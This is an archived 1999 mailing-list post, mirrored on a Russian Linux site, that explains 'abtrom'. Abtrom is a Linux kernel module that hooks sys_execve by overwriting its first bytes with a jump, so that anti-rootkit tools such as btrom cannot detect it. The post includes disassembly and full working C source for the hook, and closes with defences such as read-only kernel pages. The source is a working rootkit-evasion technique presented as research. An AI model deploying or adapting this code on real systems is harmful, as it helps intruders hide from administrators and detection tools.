The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


yet another article about stealth modules in linux.


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Sat, 28 Aug 1999 14:40:31 -0300
From: riq <[email protected]>
To: [email protected]
Subject: yet another article about stealth modules in linux.

abtrom: anti btrom
..................

Preface:
........
I've seen many stealth modules for Linux. New ways of of hiding the modules are
found, so the 'lsmod' cant find them, etc, etc. But the problem is that all
those modules hook the 'system call table' putting there their function.


Introduction:
.............
The "abtrom" is the "anti btrom" (btrom is a trojan eraser), and hooks the
system calls whitout using the sys_call_table.

Why it is not convenient to use the sys_call_table?
Using the sys_call_table to hook a system call is the 'right way', but it is
not for a stealth module, because programs like "btrom" can detect that, and
having the 'System.map' (file that every paranoic administrator must have),
every stealth module can be disabled ("btrom" uses this technique).


Ok, lets talk about the abtrom's technique. Take, for example, that we want
to hook the system call "sys_exeve".
Disassembling that function...
        kdb> id sys_execve
        sys_execve:       pushl  %ebp
        sys_execve+0x1:   movl   %esp,%ebp
        sys_execve+0x3:   subl   $0x10,%esp
        sys_execve+0x6:   pushl  %esi
        sys_execve+0x7:   pushl  %ebx
        sys_execve+0x8:   addl   $0xfffffff4,%esp
        sys_execve+0xb:   movl   0x8(%ebp),%eax
        sys_execve+0xe:   pushl  %eax
        sys_execve+0xf:   call   getname

Note that the instruction that it is the 6th position occupies only 1 byte.
(That's important).

What we have to do, is to place a 'jmp to_our_hooked_function' there.
Something like this:
        movl    hooked_execve, %eax
        jmp     *%eax

and that occupies 7 bytes, so we're going to overwrite the first 7 bytes
of the sys_exeve function (luckyly we wont 'break' and instruction).
Ok, before puting our jump there, we must backup those bytes.
And now, in our 'hooked_execve' we must place a jump to the backuped bytes.
Following with our example:

char original_bytes[20];                /* backuped bytes */
void hooked_execve( void )
{
        asm volatile( "jmp original_bytes;" );
}

and after running the backuped bytes, we must 'jump to sys_execve+7' to
continue the sys_execve code.
That's all.


The sys_exeve would look something like this:
        kdb> id sys_execve
        sys_execve:       movl   $0xc8434050,%eax
        sys_execve+0x5:   jmp    *%eax          <- Note that none of the
        sys_execve+0x7:   pushl  %ebx           <- instructions were 'broken'
        sys_execve+0x8:   addl   $0xfffffff4,%esp
        sys_execve+0xb:   movl   0x8(%ebp),%eax
        sys_execve+0xe:   pushl  %eax
        sys_execve+0xf:   call   getname



Notes: In 'our_sys_excve' we must restore the stack before doing the jump.
Look the in the abtrom.c for and example.

Another way to do the jump is (this occupies 1 byte less):
        push    $address
        ret


So, why dont we build the 'Anti abtrom'?
It's possible, but it is difficult, because a 'jump to_our_function' can be
placed in many parts of the code, and can be disguised in many ways.


Epilogue:
.........
Maybe, it's easier to prevent these cases.
Anyway, supossing that we have an intruder with 'root' access in our machine,
(and our kernel is compiled with module support) we can stop this attack with
this:
  * Put the kernel's code memory pages as read-only (this way we can't
	overwrite the sys_execve and others sys_calls).
  * Then we must put the page tables, also, as read-only.
  * And finally, when the exception comes from the 'kernel' (this is easy to
	verify. btrom uses this ), let the exception pass, otherwise consume
	it.
	
	
For info about 'btrom' take a look at:
	Phrack #54 ( http://www.phrack.com ) or
	http://www.pjn.gov.ar/~rquesada/progs.html

Thanks Bombi, Hernan, Pipa, Gera, Kato, Wari for their ideas.

riq.
--
-------------------------------------------------------------------------------

 Ricardo Quesada <[email protected]>
 Corelabs
 CORE SDI S.A.
 Pte. Juan D. Peron 315 4to UF17 (1394) Buenos Aires, Argentina.
 TE/FAX: +54-11-43-31-54-02 +54-11-43-31-54-09
 PGP fingerprint: CA40 F378 929A 854C C67B 161F 1115 B0F8 90AA E0C0
-------------------------------------------------------------------------------

<*-  abtrom.c -*>
/*
 * abtrom: anti btrom
 * 22/08/99 by riq
 * v0.2.
 *
 * compile with:
 *   gcc -c -O2 abtrom.c
 *
 * This module was tested in:
 *      kernel 2.2.10
 *   	kernel 2.0.36
 *
 */

#define MODULE
#define __KERNEL__
#include <linux/module.h>
#include <linux/version.h>
#include <syscall.h>
#include <linux/unistd.h>
#include <linux/sched.h>



extern void *sys_call_table[];

unsigned char ab_jmpcode1[7] = "\xb8\x67\x45\x23\x01"		/* mov $address, %eax */
				"\xff\xe0";			/* jmp *%eax */

unsigned char ab_bcode[20]  =  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* 13 nops */	
				"\xb8\x67\x45\x23\x01"		/* mov $address, %eax */
				"\xff\xe0";			/* jmp *%eax */

void abtrom_hook( int  a)
{
	printk("sys_execve is hooked by abtrom\n");

	asm volatile (
		"mov	%ebp, %esp;"				/* restore stack */
		"popl	%ebp;"
		"jmp	ab_bcode"
		);
}


int abtrom( int numero )
{
	int i;
	char *ptr;
	unsigned int addr;

	addr= (unsigned int) &abtrom_hook;

	ptr = (char *) &addr;			/* get from_jump address */
	for(i=0;i<4;i++)
		ab_jmpcode1[1+i]=ptr[i];

	ptr = sys_call_table[numero];
	for(i=0;i<7;i++) {
		ab_bcode[i]=ptr[i];		/* backup overwritten bytes */
		ptr[i]=ab_jmpcode1[i];		/* hook */
	}

	addr = (unsigned int) ptr+7;		/* get to_jump address */
	ptr = (char *) &addr;
	for(i=0;i<4;i++)
		ab_bcode[14+i]=ptr[i];


	return 0;
}

int init_module(void)
{
	abtrom(__NR_execve);			/* hook the EXECVE function */

	/*
	  Ocultar el modulo de la manera que mas les plazca.
	  Si van a usar -fomit-frame-buffer, modificar la forma
	  de restorear el stack.

	  Como estА, no queda oculto.
	*/

	return 0;
}

void cleanup_module(void)
{
	int i;
	char *ptr;

	ptr = sys_call_table[__NR_execve];
	for(i=0;i<7;i++)
		ptr[i] = ab_bcode[i];		/* restore de hook */

	printk("abtrom: Bye.\n");
}

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру